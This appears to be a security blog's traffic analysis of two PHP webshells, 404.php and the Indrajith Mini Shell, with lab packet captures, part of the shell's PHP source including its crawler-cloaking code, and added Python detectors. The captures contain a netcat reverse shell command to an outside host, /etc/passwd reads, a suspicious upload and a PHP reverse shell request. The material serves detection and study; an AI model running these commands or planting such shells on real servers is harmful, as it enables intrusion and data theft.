404 Not Found PHP webshell backdoor Traffic Analysis, Screenshots Reverse Shell Spawn and full PCAP file download

The 404.php webshell backdoor is a sneaky one: if an admin views the PHP page it looks as though the file is not there, just a benign 404 page:

http://computersecurity.org/images/pcapanalysis/404_1.png

The trick to logging into the shell is pressing the Tab key: a small prompt appears where you type the password to access the shell:

http://computersecurity.org/images/pcapanalysis/404_2.png

And then we log in:

http://computersecurity.org/images/pcapanalysis/404_3.png

Here is what the network traffic it generates looks like:

2017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 02:34:21.438028 IP 192.168.1.100.55555 > 192.168.1.102.53294: Flags [P.], seq 1011:1834, ack 1125, win 254, length 823
E.._.>@.@..?…d…f……{..w..P….l..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:21 GMT
Server: Apache/2.4.18 (Debian)
Set-Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

……….MP.n.0.|.W….,..%..8.
ly*.bi….-a..Q…..Wr.m. …#u.Y.?H`O..U.:..B.`……5<………D .bl….y^…….%..;….r……G’.MB.9…u..g.;..!”(..3..5C.^2n….o.i..|+..c.o.j…y:K…..’.I?..&…?.n……..82. .)…0..I…p<9…ER.`…^uX..>.^.Y.a….=….*…

2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 1:614, ack 1, win 2053, length 613
E…..@…d<…f…d.0..2….&u.P…    J..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=letmein
2017-01-20 02:34:28.742666 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 614, win 238, length 0
E..(..@.@……d…f…0.&u.2.  .P….5..
2017-01-20 02:34:28.743719 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [P.], seq 1:767, ack 614, win 238, length 766
E..&..@.@……d…f…0.&u.2.  .P….3..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:28 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:33.005742 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 614:1228, ack 767, win 2050, length 614
E…..@…d8…f…d.0..2.      ..&x.P….|..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=password
2017-01-20 02:34:33.043487 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 1228, win 248, length 0
E..(..@.@……d…f…0.&x.2…P….5..
2017-01-20 02:34:33.359844 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], seq 767:5147, ack 1228, win 248, length 4380
E..D..@.@……d…f…0.&x.2…P….Q..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:33 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:43.974969 IP 192.168.1.102.53297 > 192.168.1.100.55555: Flags [P.], seq 1:688, ack 1, win 2053, length 687
E…..@…c….f…d.1..H…….P….S..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 86
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251
2017-01-20 02:34:43.974988 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [.], ack 688, win 239, length 0
E..(..@.@……d…f…1….H..mP….5..
2017-01-20 02:34:44.314752 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [P.], seq 1:5231, ack 688, win 239, length 5230
E…..@.@..N…d…f…1….H..mP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:43 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], seq 1:712, ack 1, win 2053, length 711
E….9@…c….f…d.8……….P…….POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 109
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.139097 IP 192.168.1.100.55555 > 192.168.1.102.53304: Flags [.], ack 712, win 240, length 0
E..(.,@.@……d…f…8……..P….5..
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, win 29200, options [mss 1460,sackOK,TS val 759617908 ecr 0,nop,wscale 7], length 0
E..<D.@.@.q….d…e…\……….r..H………
-F.t……..
2017-01-20 02:35:30.611975 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [S.], seq 451231491, ack 3216154079, win 14480, options [mss 1460,sackOK,TS val 287395312 ecr 759617908,nop,wscale 6], length 0
E..<..@.@……e…d.\….?…….8..#………
.!M.-F.t….
2017-01-20 02:35:30.611988 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 759617909 ecr 287395312], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F.u.!M.

2017-01-20 02:35:36.943763 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [P.], seq 1:4, ack 1, win 227, options [nop,nop,TS val 287395945 ecr 759617909], length 3
E..7r.@.@.C….e…d.\….?………o……
.!Pi-F.uid

2017-01-20 02:35:36.943789 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F…!Pi
2017-01-20 02:35:36.944117 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 353:393, ack 160, win 408, options [nop,nop,TS val 287395945 ecr 759619491], length 40
E..\.@@.@.42…e…d…..x>^’bb……n…..
.!Pi-F…<T……z.?P%#{…j.A..9..b.<…….r..
2017-01-20 02:35:36.944130 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 393, win 951, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4u.@.@.@….d…e….’bb..x>……@…..
-F…!Pi
2017-01-20 02:35:36.945239 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [P.], seq 1:55, ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 54
E..jD.@.@.q….d…e…\……?……v…..
-F…!Piuid=33(www-data) gid=33(www-data) groups=33(www-data)
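
The session above is a compact pattern to detect: a bare password POST to a page that renders as a 404, then `a=Console` requests whose `p1` parameter carries a command, the last one a netcat reverse shell. The script below is an added example, not code from the original page: it parses raw HTTP requests as they appear after the header bytes in the tcpdump -A output, URL-decodes the form body and tags the indicators. The sample requests are constructed from the capture above; the rules generalise slightly beyond it (the `cmdexe` parameter of the mini shell further down, `/etc/shadow` alongside `/etc/passwd`).

```python
"""Flag webshell-style HTTP requests reconstructed from a tcpdump -A capture.

Added example; this is not code from the original page. The sample requests are
constructed from the 404.php session shown above (TCP/IP header bytes dropped),
and the indicator rules are generalised from what that session contains:
a bare password POST, the a=Console action, a command in p1 that reads
/etc/passwd, and a netcat reverse shell.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_REQUESTS = [
    "GET /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\n",
    "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44\r\n\r\n"
    "pass=letmein",
    "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251",
    "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash"
    "&p2=&p3=&charset=Windows-1251",
]

# Parameters that carry a command in the shells on this page: p1 for 404.php,
# cmdexe for the mini shell further down. c is the working directory, not a command.
COMMAND_PARAMS = {"p1", "cmdexe"}
REVERSE_SHELL = re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh")
SENSITIVE_FILE = re.compile(r"/etc/(?:passwd|shadow)")


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.x request into method, path, headers and decoded parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(parse_qs(body, keep_blank_values=True))
    return {"method": method, "path": url.path, "headers": headers, "params": params}


def indicators(req: dict) -> list:
    """Return the indicator tags that fire for one parsed request."""
    found = []
    params = req["params"]
    # A POST whose only field is a password, sent to a page that renders as a 404.
    if req["method"] == "POST" and set(params) == {"pass"}:
        found.append("login_post")
    if params.get("a") == ["Console"]:
        found.append("console_action")
    for name in sorted(COMMAND_PARAMS & set(params)):
        for value in params[name]:
            if REVERSE_SHELL.search(value):
                found.append(f"reverse_shell:{name}")
            elif SENSITIVE_FILE.search(value):
                found.append(f"sensitive_file:{name}")
            elif value:
                found.append(f"command:{name}")
    return found


def scan(raw_requests) -> list:
    """(path, indicators) for every request; an empty indicator list is ordinary traffic."""
    return [(req["path"], indicators(req)) for req in map(parse_request, raw_requests)]


if __name__ == "__main__":
    for path, tags in scan(SAMPLE_REQUESTS):
        print(path, tags or "-")
```

Note what the HTTP side cannot see: the `uid=33(www-data)` output above travels on a separate connection from the web server to 192.168.1.101:4444, so the request that launched `nc -e /bin/bash` is the only trace this detector gets, and the outbound SYN from the web server should be correlated with it.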

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

<?php
/*
* Indrajith Mini Shell v.2.0 with additional features....
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma, John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/

/*------------------ LOGIN -------------------*/

$username="admin";
$password="password";
$email="blah@gmail.com";

/*------------------ Login Data End ----------*/

@error_reporting(4);

/*------------------ Anti Crawler ------------*/
// Search-engine crawlers are answered with a fake 404 so the shell never appears
// in an index; every other User-Agent is served the login page.
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
    {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/
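
The anti-crawler block above gives the defender a handle: the same URL answers 404 to a search-engine User-Agent and 200 to a browser, which a legitimate page almost never does. The script below is an added example (not code from the page or from the shell) that makes that differential check. `fake_server` is a constructed stand-in reproducing the shell's logic so the script runs offline; `http_fetch` is the equivalent live request for a host you administer, and the crawler agent strings are assumed representative values, not taken from the page.

```python
"""Differential check for User-Agent cloaking.

Added example, not code from the page or from the Indrajith shell. It fetches
one URL as a browser and as several crawlers and reports when the status codes
disagree, which is exactly what the anti-crawler block above produces.
"""
import re
from urllib.error import HTTPError
from urllib.request import Request, urlopen

BROWSER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36")
# Assumed crawler strings, one per name in the shell's block list.
CRAWLER_AGENTS = {
    "Google": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Slurp": "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "Yandex": "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
}
# The shell emits this tag to keep the page out of indexes; its presence on an
# otherwise cloaked page is a second indicator.
NOINDEX_META = re.compile(r'<meta\s+name="ROBOTS"\s+content="NOINDEX', re.I)

# Constructed stand-in for a server running the shell above: same regex, same 404.
_BLOCKED = re.compile("Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler", re.I)


def fake_server(user_agent: str) -> tuple:
    if user_agent and _BLOCKED.search(user_agent):
        return 404, ""
    return 200, '<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" /><form>login</form>'


def http_fetch(url: str, user_agent: str, timeout: float = 5.0) -> tuple:
    """Live fetch; urllib raises on 4xx/5xx, so the status is recovered from the error."""
    req = Request(url, headers={"User-Agent": user_agent})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def cloaking_report(fetch) -> dict:
    """fetch(user_agent) -> (status, body). Cloaked means at least one crawler
    sees a different status than the browser does."""
    browser_status, body = fetch(BROWSER_AGENT)
    crawler_status = {name: fetch(ua)[0] for name, ua in CRAWLER_AGENTS.items()}
    return {
        "browser_status": browser_status,
        "crawler_status": crawler_status,
        "cloaked": any(s != browser_status for s in crawler_status.values()),
        "noindex_meta": bool(NOINDEX_META.search(body)),
    }


if __name__ == "__main__":
    print(cloaking_report(fake_server))
    # Against a host you administer (address from the capture above):
    # print(cloaking_report(lambda ua: http_fetch("http://192.168.1.100:55555/minishell.php", ua)))
```

Run against a web root inventory, a 200/404 split between browser and crawler agents on a PHP file is a strong reason to pull the file and read it.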

http://computersecurity.org/images/pcapanalysis/minishell2.png

http://computersecurity.org/images/pcapanalysis/minishell.png

2017-01-20 04:53:39.022938 IP 192.168.1.102.56105 > 192.168.1.100.55555: Flags [P.], seq 703:1131, ack 1011, win 2049, length 428
E…..@…F6…f…d.)……4,!.P….$..GET /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 04:53:39.023459 IP 192.168.1.100.55555 > 192.168.1.102.56105: Flags [P.], seq 1011:3471, ack 1131, win 254, length 2460
E.      .j.@.@.C….d…f…)4,!…..P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:39 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2208
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

………..YYs…~..B.T_w..1x…..6q..m;.d^…….D.R..G…….~……..}G..H.E…..W.M…y…G.Gz….z…..’…..}..O…….E…*….[x..a..Z{3..M…..T.b..pd.C…vah…i.9#:.w.l.6/..”W..yr..S7…..c6o……?.nF……h..9a.._../…..h.7Q`…..8….O…O9Z4.Q…_.yX_.Y?….=~……Xe…U.?…………z…5.i…M…1.N…….u;..o…..s.<….6…..%eeHs..[..xh…=.T.JU…I.`i….J………?……h.Z..]…..35.mx.V…O…:……..B…qlHWg…r.L[…5;.wD…t…W…..=V./..:.X-t.>N…….7.o7> ……|X….ttqfQ.&q…..0M…,Q/…5.B.mH^.t..@.M\……V.G..D…&d…q…o……….7|..y….}..w………8..=……..B…Y^>whEp.@…….IlEnH..e#l.D.W…(P.&…6.Nkp.TO;9.k        ….tO-.&.B….\……..b.}OY.gdv…J…’6`o…..<.#..O.&…xE…V4.H.d.”&.c]…d… ..[..F{..  .-.&,….e.)\.@..D..+I..O+…?qQ.=S…~L..@….H.).{…Rn)….f..H|…\,…..Z..{. !.9….._……?.x,u.0..W.[Tf”…….KA..s.B..2,.#….spH2E….i*.V…..”.4…..#v…4.g.Xd.$…pnaM.        .]…..$
.R9……..CA.0Q5.Rj,…….YZi.`.Y.B..W….3ne..p$….3……D.uG.!6….N..p?..N1.k.y.p_67.R…..3..5..3..L..l67..}.y..)..n..!..;….lS..7..#d…@…..H.”….;1……+[@-..R”.!….LL
~……….?…..Z….0..)…JD.v..     Y..`B….0r…7…C….’.9….4.W..|).{ttTH….0.p.V[..&.       .oe>.P…S ‘fV..!…Ss.ug68.T ..tD..Y…….4SP……:EXR..}.v..5….<b…..48..@..O.Ur..M.A….cH………)I.Hcb…?v.1….t(……..z.).UB.0R……=v………..vJ    …..Z..OG..Q@u.`…….8…………0.B/..(..N….,..m….’…vse..)..A.\X…I..o5..*G……….4<……Q.W.$..-i..H..U#..h..j..i…6…-vS.*…%.B4..}..(N.5….z..N…#…..8.b..agC.m.Z……..~.`P.X.P.?……..{……Wr…W…k
|.B..p#….v..’=%….B…..Z..,A.q-…….’.|..B[om     ..?..R.L..APk.WQ..{.e…..Vs0<.~……..e.@….7..mx.%40ya..|o..h…q`}1c.H.f.z…K0……z>.9..3…<.7..n=..MtN.-..k.’..^…..<.2G….W………N……..N.}….,t…:.{…mL.I..u.~
….

2017-01-20 04:53:47.492620 IP 192.168.1.102.56109 > 192.168.1.100.55555: Flags [P.], seq 1:617, ack 1, win 2053, length 616
E…..@…Eh…f…d.-..i.].V.kUP… …POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

action=login&hide=&usrname=ry4wn&passwrd=password
2017-01-20 04:53:47.492641 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [.], ack 617, win 238, length 0
E..(..@.@……d…f…-V.kUi.`XP….5..
2017-01-20 04:53:47.641385 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [P.], seq 1:4840, ack 617, win 238, length 4839
E…..@.@……d…f…-V.kUi.`XP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:47 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:54:16.709688 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [P.], seq 1:665, ack 1, win 2053, length 664
E…..@…E1…f…d.2…,….3^P…
…POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 23520
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl1cCBVNLAAiFAzMh
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:16.709713 IP 192.168.1.100.55555 > 192.168.1.102.56114: Flags [.], ack 665, win 239, length 0
E..(.7@.@..~…d…f…2..3^.,..P….5..
2017-01-20 04:54:16.744669 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [.], seq 665:6505, ack 1, win 2053, length 5840
E…..@…0….f…d.2…,….3^P…….——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”path”

/var/www/html
——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”upload_f”; filename=”cerber4.PNG”
Content-Type: image/png

.PNG

2017-01-20 04:54:29.004913 IP 192.168.1.102.56118 > 192.168.1.100.55555: Flags [P.], seq 1:527, ack 1, win 2053, length 526
E..6/.@…E….f…d.6..V*mr>-.*P…xu..GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:29.004929 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [.], ack 527, win 237, length 0
E..(.A@.@..s…d…f…6>-.*V*o.P….5..
2017-01-20 04:54:29.006011 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [P.], seq 1:4781, ack 527, win 237, length 4780
E….B@.@……d…f…6>-.*V*o.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:54:29 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4527
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], seq 1:554, ack 1, win 2053, length 553
E..Q/L@…E@…f…d.H..d…..N.P…Y…GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:55:04.451446 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [.], ack 554, win 237, length 0
E..(..@.@.1….d…f…H..N.d…P….5..
2017-01-20 04:55:04.454232 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [P.], seq 1:4888, ack 554, win 237, length 4887
E..?..@.@……d…f…H..N.d…P….L..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:55:04 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4634
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:56:27.249472 IP 192.168.1.102.56179 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.s…pk..7..P…&…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:27.249487 IP 192.168.1.100.55555 > 192.168.1.102.56179: Flags [.], ack 566, win 237, length 0
E..(..@.@……d…f…s.7…pm;P….5..
2017-01-20 04:56:27.249992 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732068 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:27.279498 IP 192.168.1.100.55555 > 192.168.1.102.56177: Flags [.], ack 567, win 237, length 0
E..(.&@.@……d…f…q…5…gP….5..
2017-01-20 04:56:27.753875 IP 192.168.1.102.56174 > 192.168.1.105.62663: Flags [R.], seq 2302, ack 1364, win 0, length 0
E..(.m@…qC…f…i.n..7.UM%l..P………….
2017-01-20 04:56:27.906170 IP 192.168.1.102.56086 > 172.217.5.238.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)j.@….^…f…………..j.P….U……..
2017-01-20 04:56:28.150144 IP 192.168.1.102.56087 > 172.217.7.161.443: Flags [.], seq 0:1, ack 1, win 255, length 1
